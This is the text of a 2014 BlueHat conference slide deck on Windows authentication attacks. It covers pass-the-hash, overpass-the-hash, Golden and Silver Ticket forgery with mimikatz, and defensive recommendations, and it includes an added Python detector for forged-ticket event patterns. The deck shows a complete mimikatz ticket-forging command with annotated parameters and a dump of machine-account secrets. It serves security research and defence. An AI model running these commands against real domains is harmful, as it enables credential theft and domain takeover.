Reality Bites: The Attacker’s View of Windows Authentication and Post-exploitation 
Chris CAMPBELL `obscuresec` 
Benjamin DELPY `gentilkiwi` 
Skip DUCKWALL `passingthehash`
`whoami /groups` ? 
Chris CAMPBELL - @obscuresec 
– Pentester / Researcher / Former Army Red Team 
– One of the authors of PowerSploit – PowerShell based post-exploitation toolkit 
– Presented at Blackhat, Defcon, and more 
Benjamin DELPY - @gentilkiwi 
– Security researcher (the French guy with flashy Tahitian shirts) 
– Author of mimikatz 
– Presented at Black Hat, Defcon, PHDays, and more 
Skip DUCKWALL - @passingthehash 
– Pentester / Researcher / Former Army Red Team 
– Patched pass-the-hash functionality into many tools used by pentesters 
– Presented at Blackhat, Defcon, and more 
10/10/2014 Chris, Ben & Skip @ BlueHat Reality Bites - The Attacker’s View of Windows Authentication and Post-exploitation 2
What we’re talking about 
The world that exists outside Microsoft 
Windows authentication in the real world 
Popular attacks against Windows authentication in the real world 
mimikatz 
One quick question? 
Who won the Xbox One? 
All three of us have asked a lot 
– Even at MSRC ;) 
So let’s use #askpth 
– … as the official hashtag of this talk! 
The Idealistic View 
Everybody runs the most up-to-date software 
– All clients are Windows 8.1 / servers are 2012R2 
– Domain / forest is at 2012R2 functional level 
– All software is patched quickly 
– Completely homogeneous Microsoft environment 
A More Realistic View - Environment 
Heterogeneous environments 
Mix of Linux / Unix / Windows on the server side 
– License costs prohibitive if not bundled with server hardware 
– Virtualization makes spinning up new servers quick and easy 
• license costs can grow quickly as well 
Desktops are often a mix of various flavors of Windows 
– Some OSX / Macs as well 
Unix authentication sometimes integrated with Active Directory 
– LDAP 
The Realistic View - Patching 
Patching is inconsistent 
– Especially 3rd-party software 
• Java / Acrobat Reader 
Some services will be patched quickly 
Some services on ‘don’t touch’ lists 
Patching frequency is usually inversely proportional to the criticality of the system 
The Realistic View - Desktop 
Most enterprises are still transitioning from XP to Windows 7 
– Licenses are expensive and often paired with hardware upgrades 
None of the enterprises we’ve seen use 8.1 
– Most enterprises have decided to see what happens with 10+ (XP approach) 
Some places still have 2000 or NT and older 
– See @Viss scan of the internet 
– Shodan HQ 
The Realistic View - Office 
Mix of Office 2007 / 2010 in use 
– with a lot of VBA ;) 
Little incentive to upgrade 
– Making stuff more “cloud capable” causes issues in many enterprises 
• 3rd party doctrine regarding information remaining private / confidential 
• Ownership issues 
• Technology has evolved, laws haven’t caught up 
The Realistic View – Server OS 
Many places still run 2003 domain functional level and are only now transitioning to 2008 / 2008R2 
Most Windows servers are running 2008 / 2008R2 
Server 2003 being transitioned away from due to EOL 
Server 2012 / 2012R2 has some traction 
Criticality of server determines upgrades 
– The more critical the server, the less likely it is to be upgraded 
The Realistic View - Other Server Software 
SQL server 
– Whatever version the developer / app wanted to use when installed 
– Usually multiple versions at the same time 
– If the app works, little incentive to upgrade 
Exchange 
– 2007 or 2010 
– Not a lot of incentive to upgrade since it’s viewed as critical infrastructure 
SharePoint 
– 2007 or 2010 
– Not a lot of incentive to upgrade depending on usage 
The Net Result? 
New features of the latest software will not be present in the average environment 
Most enterprises will not regard a new security feature as worth upgrading the platform for 
It could be 5+ years before some features are seen in the average environment 
Attackers in the Real World (1) 
“Real World” attack knowledge suffers from research bias 
– Sometimes we only find what we’re looking for 
– Once we find something in the past, we tend to look for that first the next time 
– New or novel attacks go unnoticed for years 
Attackers are less interested in being disruptive 
Attackers are more interested in gaining access to corporate data 
– Domain / enterprise admin usually not the ultimate goal 
– Usually a checkpoint along the way to find the people with access to the goods 
– Possible with targeted attacks to never touch any privileged accounts 
• Example: Target devs or HR 
Attackers in the Real World (2) 
Most discovered attacks don’t involve 0-day exploits 
– 0-days are expensive 
– More difficult to discover post-attack 
– Likely only required for hardened targets 
Most breach responders overestimate their defensive capabilities, and therefore overestimate attacker capabilities 
Attackers in the Real World (3) 
Client-side attacks combined with social engineering are the most likely vectors 
– Everybody clicks on dancing cats 
– Email addresses are easy to collect or figure out 
– Client-side vulnerabilities appear to be more plentiful 
– Some products have come a long way: IE with EMET 
– Some still have a ways to go: Java / Flash / Acrobat Reader 
– Recentish breaches give attackers access to employee’s social networks 
• Easier to create more legit looking context 
Use an exploit to get in, then depend on bad architecture to work deeper 
Attackers in the Real World (4) 
After initial compromise, attackers will take their time on post-exploitation 
– Targeted information sought 
• Client lists 
• Source Code 
• Schematics 
• Financial Information 
• Credit card info / PII / PHI 
• Private keys / certificates / code signing certs 
Attackers usually have weeks to months 
– Detection usually takes months based on the latest Verizon report 
• http://www.verizonenterprise.com/DBIR/ 
Post-exploitation Techniques (1) 
An entirely different talk 
A few highlights 
– Group Policy Preferences 
• Anybody with access to DC could recover any credentials set with GPP 
• Potentially allows elevation in automation scripts 
• ~Patched with MS14-025 
– Plaintext credentials in automation scripts 
• Mount a share somewhere, copy stuff 
– Service accounts 
• Tend to be privileged with easy-to-guess passwords that haven’t changed in years 
Post-exploitation Techniques (2) 
Poorly configured file shares 
– Password lists 
• Search for ‘password.txt’ 
– Backups of critical infrastructure / configs 
– Unattended installers 
• If it automagically joins the domain, there’s a password somewhere 
Poorly configured Sharepoint 
– Use the search functionality to find password lists and config files 
Post-exploitation Tools (1) 
Attackers have a wide variety of tools they can use 
Many are legit tools being used nefariously 
– PowerShell 
• Allows access to WINAPI / entire .NET framework 
• Can be used to bypass even the most mature application whitelisting products 
• Trivial AV bypass 
– SysInternals 
• Why not do ‘bad things’ with Microsoft signed binaries? 
• PsExec, AdExplorer, ProcDump, and others 
Post-exploitation Tools (2) 
NT Resource Kit 
– Many useful utilities that are now built-in commands 
– sc, dnsquery, etc. 
– srvany – make any program a service 
Built-in commands 
– net.exe, cmd.exe, netsh.exe 
Some tools are really only useful for post-exploitation 
– mimikatz 
mimikatz (1) 
Designed by Benjamin to learn more about Windows programming 
– Seriously 
– We aren’t joking 
Exposed several issues with plaintext passwords being stored in memory 
– Passwords being stored in LSASS by various SSPs 
• WDigest and others 
– Partially fixed by Microsoft 
– Passwords will be back in LSASS if users need certain SSO 
– Third-party SSPs still have access to passwords 
• RSA for example 
• mimikatz rolled its own as well 
mimikatz (2) 
Can recover keys / hashes for accounts in memory 
Can be used to implement pass-the-hash attacks 
– PTH = using hashes as password equivalents 
– NTLM is DESIGNED this way 
– Windows OS uses PTH 
• NTLM service provider only stores the hash in memory 
[Diagram: LSASS memory holding the account’s LM and NTLM (md4) hash, cc36cf7a8514893efccd332446158b1a] 
mimikatz (3) 
Can be used to implement Kerberos attacks 
– Can be used to recover a user’s Kerberos tickets 
• Both TGTs and service tickets 
– Can be used to insert tickets into LSASS for use 
• Using a native Windows API 
– Can be used to upgrade NTLM hash to a Kerberos ticket 
• This is “overpass-the-hash” 
• Introduced at Black Hat USA 2014 
• Also works for recovered AES keys on the client side 
[Diagram: keys held by LSASS (kerberos) for the « chocolate.local » domain: des_cbc_md5, rc4_hmac_nt (NTLM/md4, cc36cf7a8514893efccd332446158b1a), aes128_hmac, aes256_hmac. The client holds a TGT, sends ③ TGS-REQ to the KDC, receives ④ TGS-REP containing the TGS, then ⑤ uses it against the service.] 
Demo! New version of mimikatz, in new version of Windows, in front of Microsoft staff 
mimikatz :: Golden Tickets (1) 
Can be used to implement Golden Ticket attacks 
– If KRBTGT hash/keys lost 
• Domain dump 
– Password audit (legitimate use case) 
– Poorly redacted pentest report 
• Other 
– Compromise 
– File backup of the domain controller 
• Shadow copy trick 
• Recovery of backup tapes or access to backup file share 
– Compromise of virtual machine infrastructure 
• Copy the drive image or a snapshot of the image 
mimikatz :: Golden Tickets (2) 
Made worse by KRBTGT rarely changing 
– Only changes during domain functional upgrade from NT5 -> NT6 
– 2000/2003 to 2008/2012 
• 2008 -> 2012 doesn’t change the value 
• the previous one (n-1) still valid… 
– Means the age of the hash in the average operational environment is measured in YEARS 
mimikatz :: Golden Tickets (3) 
KRBTGT hash can be used to generate arbitrary TGTs for use 
– Can make user a member of any group, even make it multiple users! 
• Even users and SIDs that do not exist 
– TGTs will only work for 20 minutes to get service tickets (however, any service tickets will be good for 10 hours by default) 
• Any account can create / use a spoofed ticket; it doesn’t require elevated rights 
– Can be used to bypass account restrictions 
• Disabled / expired 
• Authentication silos 
• “protected users” group is just a group SID in the TGT 
– Create a trail of false events 
• Incident handlers rely on event logs 
• Easy to frame another user 
Demo ! 
mimikatz :: BlackHat erratum 
At BlackHat, we announced that to forge a TGS, we need 2 keys 
– krbtgt key 
– target key 
The krbtgt key is needed to sign the PAC, to avoid alterations 
– But how can a remote service check this signature without the key? 
• Remember? Kerberos is SYMMETRIC 
– Easy: it delegates PAC checks to the KDC… 
mimikatz :: BlackHat erratum 
Windows 2000 Server and Windows XP do not validate the PAC when the application server is running under the local system context or has SeTcbPrivilege […] 
Windows Server 2003 does not validate the PAC when the application server is running under the local system context, the network service context, or has SeTcbPrivilege. […] 
Windows Server 2003 with SP1 does not validate the PAC when the application server is under the local system context, the network service context, the local service context, or has SeTcbPrivilege privilege. […] 
Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012, Windows 8.1, and Windows Server 2012 R2 do not validate the PAC by default for services. Windows still validates the PAC for processes that are not running as services. PAC validation can be enabled when the application server is not running in the context of local system, network service, or local service; or it does not have SeTcbPrivilege […] 
http://msdn.microsoft.com/library/cc224027.aspx#id2 
mimikatz :: Silver Tickets (1) 
So “in real life”, a TGS only needs the target key… no classic service will check the signature…, so let’s call them: Silver Tickets! 
Ticket type                      | Default lifetime | Minimum number of KDC accesses | Multiple targets | Available with Smartcard | Realtime check for restrictions (account disabled, logon hours...) | Protected Users (check for encryption RC4/AES) | Can be found in                  | Is funky 
Normal                           | 42 days          | 2                              | Yes              | Yes                      | Yes                                                                | Yes                                            | n.a.                             | No 
Overpass-the-hash (Pass-the-key) | 42 days          | 2                              | Yes              | No                       | Yes                                                                | Yes                                            | Active Directory, Client Memory  | No (ok, a little ;)) 
Pass-the-Ticket (TGT)            | 10 hours         | 1                              | Yes              | Yes                      | No (20mn after)                                                    | No                                             | Client Memory                    | Yes 
Pass-the-Ticket (TGS)            | 10 hours         | 0                              | No               | Yes                      | No                                                                 | No                                             | Client Memory                    | Yes 
Silver Ticket                    | [30;60] days     | 0                              | No               | Yes                      | No                                                                 | No                                             | n.a.                             | Yes 
Golden Ticket                    | 10 years         | 1                              | Yes              | Yes                      | No (we can cheat)                                                  | No                                             | n.a.                             | Fuck, Yes! 
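The “minimum number of KDC accesses” column doubles as a detection handle: a forged TGT skips the AS exchange (one KDC trip instead of two) and a Silver Ticket skips the KDC entirely (zero). The Python below is an added example, not code from the deck or from mimikatz; it correlates constructed DC events (4768 TGT request, 4769 service-ticket request) and member-server logon events (4624) against a constructed directory snapshot, and flags the Golden Ticket traits from the slide above (nonexistent or disabled accounts, TGS without AS-REQ) and the Silver Ticket trait (service logon with no ticket issued by the KDC). It assumes all three sources are forwarded into one list; the record field names are this example’s own.

```python
from datetime import datetime, timedelta

# Default lifetimes named on the slides: TGT 10 hours, service ticket 10 hours.
TGT_LIFETIME = timedelta(hours=10)
TGS_LIFETIME = timedelta(hours=10)

# Constructed directory snapshot (sAMAccountName -> account enabled?).
# A forged ticket can name an account that is disabled or does not exist at all.
DIRECTORY = {
    "alice": True,
    "Administrator": True,
    "bob": False,   # disabled, so a real KDC would refuse it
}

# Constructed events, already forwarded from the DC (4768/4769) and a member
# server (4624) into one list. Field names are an assumption of this example.
EVENTS = [
    {"id": 4768, "time": "2014-10-10T08:00:00", "user": "alice", "client": "10.0.0.5"},
    {"id": 4769, "time": "2014-10-10T08:00:05", "user": "alice", "client": "10.0.0.5",
     "service": "cifs/fs01.blue.local"},
    {"id": 4624, "time": "2014-10-10T08:00:06", "user": "alice", "client": "10.0.0.5",
     "service": "cifs/fs01.blue.local"},
    # Golden Ticket trait: TGS-REQ with no AS-REQ, for a user that does not exist.
    {"id": 4769, "time": "2014-10-10T09:15:00", "user": "ghost", "client": "10.0.0.77",
     "service": "cifs/dc01.blue.local"},
    # Golden Ticket trait: ticket for a disabled account, again without AS-REQ.
    {"id": 4769, "time": "2014-10-10T09:16:00", "user": "bob", "client": "10.0.0.77",
     "service": "ldap/dc01.blue.local"},
    # Silver Ticket trait: logon at the file server with no TGS issued by the KDC.
    {"id": 4624, "time": "2014-10-10T10:00:00", "user": "Administrator",
     "client": "10.0.0.77", "service": "cifs/fs01.blue.local"},
]


def _recent(times, now, window):
    """True if any timestamp in `times` falls within `window` before `now`."""
    return any(now - window <= t <= now for t in times)


def detect(events, directory, tgt_lifetime=TGT_LIFETIME, tgs_lifetime=TGS_LIFETIME):
    """Return (event_id, user, reason) findings in event order.

    Reasons:
      unknown-account     ticket names an account missing from the directory
      disabled-account    ticket names a disabled account (restriction bypassed)
      tgs-without-as-req  4769 with no 4768 for that user/client in the TGT lifetime
      logon-without-tgs   4624 with no 4769 for that user/client/service from the KDC
    """
    findings = []
    tgt_seen = {}   # (user, client) -> [times a 4768 was logged]
    tgs_seen = {}   # (user, client, service) -> [times a 4769 was logged]
    for ev in sorted(events, key=lambda e: e["time"]):
        now = datetime.fromisoformat(ev["time"])
        user, client = ev["user"], ev["client"]
        if ev["id"] == 4768:
            tgt_seen.setdefault((user, client), []).append(now)
            continue
        # Account checks apply to any ticket use (TGS request or service logon).
        if user not in directory:
            findings.append((ev["id"], user, "unknown-account"))
        elif not directory[user]:
            findings.append((ev["id"], user, "disabled-account"))
        if ev["id"] == 4769:
            if not _recent(tgt_seen.get((user, client), []), now, tgt_lifetime):
                findings.append((4769, user, "tgs-without-as-req"))
            tgs_seen.setdefault((user, client, ev["service"]), []).append(now)
        elif ev["id"] == 4624:
            key = (user, client, ev["service"])
            if not _recent(tgs_seen.get(key, []), now, tgs_lifetime):
                findings.append((4624, user, "logon-without-tgs"))
    return findings


if __name__ == "__main__":
    for event_id, user, reason in detect(EVENTS, DIRECTORY):
        print(f"event {event_id} user={user}: {reason}")
```

Gaps in event forwarding produce the same signals as forged tickets, so treat findings as triage leads and pair them with the baseline of normal privileged activity the deck recommends.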
mimikatz :: Silver Tickets (2) 
How do we make a Silver Ticket? 
– Exactly like a Golden Ticket, except for the krbtgt key 
– Target name (server FQDN) 
– Service name 
– We must have the “Target Key” 
• From Client Memory 
• From Active Directory (ok, then we can make a Golden Ticket ;) 
• or... from the registry (even offline!) 
mimikatz # lsadump::secrets 
Domain : CLIENT 
SysKey : 5418b222b48866feea6f633efcf8417d 
Policy subsystem is : 1.13 
LSA Key(s) : 1, default {13e98d1c-c7d5-1099-6477-5dbbed69ec73} 
[00] {13e98d1c-c7d5-1099-6477-5dbbed69ec73} 
c2e2ee5bfeb6a4fd4f58ab8554c42a585a093b116ee8ce830ee227e0c31071a4 
Secret : $MACHINE.ACC 
cur/NTLM:1acf72e4e8a2d6209fe96920ff800110/text: ,QK@Y+i$ nA9BCcrRvnPsaWE/m3_h?U+U^3AL-LF!_ 
8y<2.xH>'^F;>OA.(9v9!(_[=51Pj_]YqKV!5`LIsk=*F`q-/dP:kP))bDhA'!2R/x#u=)O$2W0me 
mimikatz :: Silver Tickets (3) 
Before that, who cares about this computer password ? 
– No… really ? 
– Yeah, like for the krbtgt account 
– At least, this time the password can change every 30 days... 
• But the n-1 is still valid (so [30;60] days)… and the password still works if it is not changed… 
$MACHINE.ACC is the new krbtgt, localized to a computer 
– And it’s in the registry 
Silver ticket is the new Golden Ticket, localized to a target/service 
When you use a Service Account linked to a Kerberized Service, it can be localized to multiple targets (see SPN) 
– Good chance you can find it in the registry too ;) 
mimikatz :: Silver Tickets (4) 
Kerberos services rely on SPNs 
– Nobody likes to set up SPNs (like MIT Kerberos) 
– That’s why Microsoft made it ~easy for you (like MIT Kerberos) 
The host SPN is not only for “host”, but is an alias for: 
alerter appmgmt cisvc clipsrv browser dhcp 
dnscache replicator eventlog eventsystem policyagent oakley 
dmserver dns mcsvc fax msiserver ias 
messenger netlogon netman netdde netddedsm nmagent 
plugplay protectedstorage rasman rpclocator rpc rpcss 
remoteaccess rsvp samss scardsvr scesrv seclogon 
scm dcom cifs spooler snmp schedule 
tapisrv trksvr trkwks ups time wins 
www http w3svc iisadmin msdtc 
mimikatz :: Silver Tickets (5) 
kerberos::golden 
/domain:blue.local <= domain name 
/sid:S-1-5-21-4174036629-1679296857-797215250 <= domain SID 
/rc4:1acf72e4e8a2d6209fe96920ff800110 <= NTLM/RC4 of the Target/Service 
/target:client.blue.local <= Target FQDN 
/service:cifs <= Service name 
/user:Administrator <= username you wanna be 
/id:500 <= RID of username (500 is THE domain admin) 
/groups:513,512,520,518,519 <= Groups list of the user (be imaginative) 
/ticket:cifs.client.kirbi <= the ticket filename (or /ptt) 
Demo! New version of mimikatz, in new version of Windows, in front of Microsoft staff, with new features 
mimikatz :: Bonus 
Mimikatz is full of love for pentesters, but we can’t show it all! 
– We are modest 
A little driver to bypass Protected Process 
– Avoids RunAsPPL for LSASS, for example 
AddSid 
– An experimental function to add the SID of users/groups to another user in Active Directory (admin without the admin group) 
Think PIN codes and picture passwords are better? 
– You’re a l33t company, you use fingerprints in Windows 8? 
– Passwords are in the local vault of SYSTEM… you know? The same as the password in the registry… 
mimilib & memssp 
– Grab all passwords! 
Demo ! 
Do Smart Cards Help? (1) 
With Windows Auth, not really 
– High cost 
– Painful deployment 
– Other benefits (email certs, ID certs for web servers) 
Password hashes are randomly generated and stored 
– They never change by default 
– Useful for PTH 
– Password could still be reset 
• One location set the password after smart card enrollment to the same password for all users (thousands) 
– NTLM hash stored in Kerberos ticket 
Do Smart Cards Help? (2) 
Smart cards are only required for INTERACTIVE logon 
– Second factor null and void for network logons 
– File shares, etc 
Smart cards are considered a stronger form of authentication 
– which means somebody could launch a password-guessing attack against the account and possibly lock it 
– The account is silently unlocked with a successful smart card login 
– The user is never notified 
– Even then, it gives the user… Kerberos tickets… usable without the SC. 
What does a compromise really mean? 
Need to be honest with ourselves: 
– A domain CANNOT BE RECOVERED once it is COMPROMISED 
• … but very few people can detect when their domain is compromised 
– How does the “assume breach” mentality collide with the “10 Immutable Laws of Security”? 
– Education 
• If this is the new stance, step up and release actionable guidance for strategic decision makers 
– C-Level 
– Security Managers 
Next Steps (1) 
Not all technical 
– Educational 
– Strategic 
Must give clients the real keys to make the transition easy 
– Disabling NTLM has been an option for a long time, but who cares? 
• That and people like devices like printers and scanners that use network authentication 
– WDigest can be disabled on Windows 7, but who will push the fixit? 
– Using CNG or Virtual Smart Cards too, but who cares? 
• Most products are not compatible 
Next Steps (2) 
Good security must not be a hard option to set AFTER compromise 
Give sysadmins / blue teams tools for serious monitoring (the event log is very NT4) 
– Recent addition of command line auditing is a good first step, what’s next? 
Enhance admin tools to securely manage large deployments 
– Provide a secure method for managing local users across an enterprise 
– One of the appeals of GPP was user management, although poorly implemented/insecure 
Service / feature minimization 
– Unix has done this for years 
– If you don’t need a feature, make it so it can be easily disabled / removed 
– Issue guidance on what features are required and how to disable those that aren’t 
Next Steps (3) 
Design services that are breach-resistant 
– Advice can’t be to rebuild the forest every day / week 
– Design services that are more “tamper evident” 
• Alert defenders if key services are touched 
• Develop interesting methods to detect things like the Kerberos attacks 
Authentication is hard 
– If we had the solution, we’d be rich 
– Requires active research 
• Not a one-size-fits-all solution 
• Local authentication != cloud authentication 
• Room for many solutions 
Next Steps (4) 
Asymmetric encryption might be the answer? 
– Key exchange is always the problem 
• Figure this one out and you might have a way forward 
Hardware integration? 
– Critical credentials stored on a crypto chip that is tied to a particular computer? 
Third Party Support 
– Accept the fact that most environments are heterogeneous 
– Printers / Scanners / Future devices need to authenticate 
– Develop proactive solutions for authentication, document and share 
Next Steps (5) 
Minimize and learn from previous mistakes 
– NTLM weakness = hash is password equivalent 
– AES keys are treated the same way currently in Windows 
• Recover AES keys, get Kerberos ticket, win 
– Kerberos design weaknesses have been well documented since 1990s 
• Designed to minimize authentication traffic / load, not necessarily for security / robustness 
Next Steps (6) 
Break with the past 
– Backwards compatibility will always get you 
– At some point in time you have to put it out of your misery 
Remember that the solution can’t be Microsoft-only 
– Printers / scanners / etc. need to be able to interact as well 
– Design for future network needs as well 
Defensive Measures 
It’s difficult to get everything correct 
– Old adage: Defenders have to be right all the time, attackers only have to be right once 
– Try to move towards “secure by default” or “fail closed” 
• Or at least give enterprises the capability to do so if they choose to 
Best measures are usually detective 
– Know what normal looks like for privileged users 
– Spot the abnormalities 
• Defensive staff knows when an admin is on vacation or off shift 
– Enhance auditing capabilities and increase alerting 
That’s all Folks! 
We would especially like to thank: 
– Will Peteroy 
– Joe Bialek 
– Akila Srinivasan 
– 80’s (first versions of Kerberos) 
– 90’s (first versions of NTLM) 
– All (previous?) architects of Microsoft for making it possible 
Seriously, we know it’s hard to change things in security with backward compatibility and business in the balance! 
Websites, Source Codes & Contact 
blog http://obscuresecurity.blogspot.com 
source https://github.com/obscuresec 
contact @obscuresec / obscuresec@gmail.com 
blog http://blog.gentilkiwi.com 
mimikatz http://blog.gentilkiwi.com/mimikatz 
source https://github.com/gentilkiwi/mimikatz 
contact @gentilkiwi / benjamin@gentilkiwi.com 
blog http://passing-the-hash.blogspot.com 
source https://github.com/gentilkiwi/mimikatz 
contact @passingthehash / exorcyst@gmail.com 


DevOps and the cloud: all hail the (developer) king - Daniel Bryant, Steve Poole
DevOps and the cloud: all hail the (developer) king - Daniel Bryant, Steve PooleDevOps and the cloud: all hail the (developer) king - Daniel Bryant, Steve Poole
DevOps and the cloud: all hail the (developer) king - Daniel Bryant, Steve PooleJAXLondon_Conference
 
JAXLondon 2015 "DevOps and the Cloud: All Hail the (Developer) King"
JAXLondon 2015 "DevOps and the Cloud: All Hail the (Developer) King"JAXLondon 2015 "DevOps and the Cloud: All Hail the (Developer) King"
JAXLondon 2015 "DevOps and the Cloud: All Hail the (Developer) King"Daniel Bryant
 
Ctolinux 2001
Ctolinux 2001Ctolinux 2001
Ctolinux 2001eaiti
 
The Enemy Within: Organizational Insight Through the Eyes of a Webserver
The Enemy Within: Organizational Insight Through the Eyes of a WebserverThe Enemy Within: Organizational Insight Through the Eyes of a Webserver
The Enemy Within: Organizational Insight Through the Eyes of a WebserverRamece Cave
 
KCD Munich - Cloud Native Platform Dilemma - Turning it into an Opportunity
KCD Munich - Cloud Native Platform Dilemma - Turning it into an OpportunityKCD Munich - Cloud Native Platform Dilemma - Turning it into an Opportunity
KCD Munich - Cloud Native Platform Dilemma - Turning it into an OpportunityAndreas Grabner
 
2nd ICANN APAC-TWNIC Engagement Forum: What is Hitting my Honeypots?
2nd ICANN APAC-TWNIC Engagement Forum: What is Hitting my Honeypots?2nd ICANN APAC-TWNIC Engagement Forum: What is Hitting my Honeypots?
2nd ICANN APAC-TWNIC Engagement Forum: What is Hitting my Honeypots?APNIC
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopErnest Staats
 
Derbycon - Passing the Torch
Derbycon - Passing the TorchDerbycon - Passing the Torch
Derbycon - Passing the TorchWill Schroeder
 
Mobile code mining for discovery and exploits nullcongoa2013
Mobile code mining for discovery and exploits nullcongoa2013Mobile code mining for discovery and exploits nullcongoa2013
Mobile code mining for discovery and exploits nullcongoa2013Blueinfy Solutions
 
BSidesDC 2016 Beyond Automated Testing
BSidesDC 2016 Beyond Automated TestingBSidesDC 2016 Beyond Automated Testing
BSidesDC 2016 Beyond Automated TestingAndrew McNicol
 
CONFidence2015: Real World Threat Hunting - Martin Nystrom
CONFidence2015: Real World Threat Hunting - Martin NystromCONFidence2015: Real World Threat Hunting - Martin Nystrom
CONFidence2015: Real World Threat Hunting - Martin NystromPROIDEA
 
Programming languages and techniques for today’s embedded andIoT world
Programming languages and techniques for today’s embedded andIoT worldProgramming languages and techniques for today’s embedded andIoT world
Programming languages and techniques for today’s embedded andIoT worldRogue Wave Software
 
CodeOne SF 2018 "Are you deploying and operating with security in mind?"
CodeOne SF 2018 "Are you deploying and operating with security in mind?"CodeOne SF 2018 "Are you deploying and operating with security in mind?"
CodeOne SF 2018 "Are you deploying and operating with security in mind?"Daniel Bryant
 
A Closer Look at Isolation: Hype or Next Gen Security?
A Closer Look at Isolation: Hype or Next Gen Security?A Closer Look at Isolation: Hype or Next Gen Security?
A Closer Look at Isolation: Hype or Next Gen Security?MenloSecurity
 
Developing Secure Web Apps
Developing Secure Web AppsDeveloping Secure Web Apps
Developing Secure Web AppsMark Garratt
 
XenDesktop Master Class - Virtualising Microsoft Lync - March 2015
XenDesktop Master Class - Virtualising Microsoft Lync - March 2015XenDesktop Master Class - Virtualising Microsoft Lync - March 2015
XenDesktop Master Class - Virtualising Microsoft Lync - March 2015Lee Bushen
 
deftcon 2015 - Dave Piscitello - DNS Traffic Monitoring
deftcon 2015 - Dave Piscitello - DNS Traffic Monitoringdeftcon 2015 - Dave Piscitello - DNS Traffic Monitoring
deftcon 2015 - Dave Piscitello - DNS Traffic MonitoringDeft Association
 
Catch Me If You Can - Finding APTs in your network
Catch Me If You Can - Finding APTs in your networkCatch Me If You Can - Finding APTs in your network
Catch Me If You Can - Finding APTs in your networkDefCamp
 

Similar to BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploitation (20)

DevOps and the cloud: all hail the (developer) king - Daniel Bryant, Steve Poole
DevOps and the cloud: all hail the (developer) king - Daniel Bryant, Steve PooleDevOps and the cloud: all hail the (developer) king - Daniel Bryant, Steve Poole
DevOps and the cloud: all hail the (developer) king - Daniel Bryant, Steve Poole
 
JAXLondon 2015 "DevOps and the Cloud: All Hail the (Developer) King"
JAXLondon 2015 "DevOps and the Cloud: All Hail the (Developer) King"JAXLondon 2015 "DevOps and the Cloud: All Hail the (Developer) King"
JAXLondon 2015 "DevOps and the Cloud: All Hail the (Developer) King"
 
Ctolinux 2001
Ctolinux 2001Ctolinux 2001
Ctolinux 2001
 
The Enemy Within: Organizational Insight Through the Eyes of a Webserver
The Enemy Within: Organizational Insight Through the Eyes of a WebserverThe Enemy Within: Organizational Insight Through the Eyes of a Webserver
The Enemy Within: Organizational Insight Through the Eyes of a Webserver
 
KCD Munich - Cloud Native Platform Dilemma - Turning it into an Opportunity
KCD Munich - Cloud Native Platform Dilemma - Turning it into an OpportunityKCD Munich - Cloud Native Platform Dilemma - Turning it into an Opportunity
KCD Munich - Cloud Native Platform Dilemma - Turning it into an Opportunity
 
2nd ICANN APAC-TWNIC Engagement Forum: What is Hitting my Honeypots?
2nd ICANN APAC-TWNIC Engagement Forum: What is Hitting my Honeypots?2nd ICANN APAC-TWNIC Engagement Forum: What is Hitting my Honeypots?
2nd ICANN APAC-TWNIC Engagement Forum: What is Hitting my Honeypots?
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise Workshop
 
Derbycon - Passing the Torch
Derbycon - Passing the TorchDerbycon - Passing the Torch
Derbycon - Passing the Torch
 
Mobile code mining for discovery and exploits nullcongoa2013
Mobile code mining for discovery and exploits nullcongoa2013Mobile code mining for discovery and exploits nullcongoa2013
Mobile code mining for discovery and exploits nullcongoa2013
 
128-ch4.pptx
128-ch4.pptx128-ch4.pptx
128-ch4.pptx
 
Open Source in the Enterprise
Open Source in the EnterpriseOpen Source in the Enterprise
Open Source in the Enterprise
 
BSidesDC 2016 Beyond Automated Testing
BSidesDC 2016 Beyond Automated TestingBSidesDC 2016 Beyond Automated Testing
BSidesDC 2016 Beyond Automated Testing
 
CONFidence2015: Real World Threat Hunting - Martin Nystrom
CONFidence2015: Real World Threat Hunting - Martin NystromCONFidence2015: Real World Threat Hunting - Martin Nystrom
CONFidence2015: Real World Threat Hunting - Martin Nystrom
 
Programming languages and techniques for today’s embedded andIoT world
Programming languages and techniques for today’s embedded andIoT worldProgramming languages and techniques for today’s embedded andIoT world
Programming languages and techniques for today’s embedded andIoT world
 
CodeOne SF 2018 "Are you deploying and operating with security in mind?"
CodeOne SF 2018 "Are you deploying and operating with security in mind?"CodeOne SF 2018 "Are you deploying and operating with security in mind?"
CodeOne SF 2018 "Are you deploying and operating with security in mind?"
 
A Closer Look at Isolation: Hype or Next Gen Security?
A Closer Look at Isolation: Hype or Next Gen Security?A Closer Look at Isolation: Hype or Next Gen Security?
A Closer Look at Isolation: Hype or Next Gen Security?
 
Developing Secure Web Apps
Developing Secure Web AppsDeveloping Secure Web Apps
Developing Secure Web Apps
 
XenDesktop Master Class - Virtualising Microsoft Lync - March 2015
XenDesktop Master Class - Virtualising Microsoft Lync - March 2015XenDesktop Master Class - Virtualising Microsoft Lync - March 2015
XenDesktop Master Class - Virtualising Microsoft Lync - March 2015
 
deftcon 2015 - Dave Piscitello - DNS Traffic Monitoring
deftcon 2015 - Dave Piscitello - DNS Traffic Monitoringdeftcon 2015 - Dave Piscitello - DNS Traffic Monitoring
deftcon 2015 - Dave Piscitello - DNS Traffic Monitoring
 
Catch Me If You Can - Finding APTs in your network
Catch Me If You Can - Finding APTs in your networkCatch Me If You Can - Finding APTs in your network
Catch Me If You Can - Finding APTs in your network
 

More from Benjamin Delpy

Cecyf / Coriin - mimikatz et la mémoire de Windows
Cecyf / Coriin - mimikatz et la mémoire de WindowsCecyf / Coriin - mimikatz et la mémoire de Windows
Cecyf / Coriin - mimikatz et la mémoire de WindowsBenjamin Delpy
 

More from Benjamin Delpy (6)

Cecyf / Coriin - mimikatz et la mémoire de Windows
Cecyf / Coriin - mimikatz et la mémoire de WindowsCecyf / Coriin - mimikatz et la mémoire de Windows
Cecyf / Coriin - mimikatz et la mémoire de Windows
 
mimikatz @ rmll
mimikatz @ rmllmimikatz @ rmll
mimikatz @ rmll
 
mimikatz @ sthack
mimikatz @ sthackmimikatz @ sthack
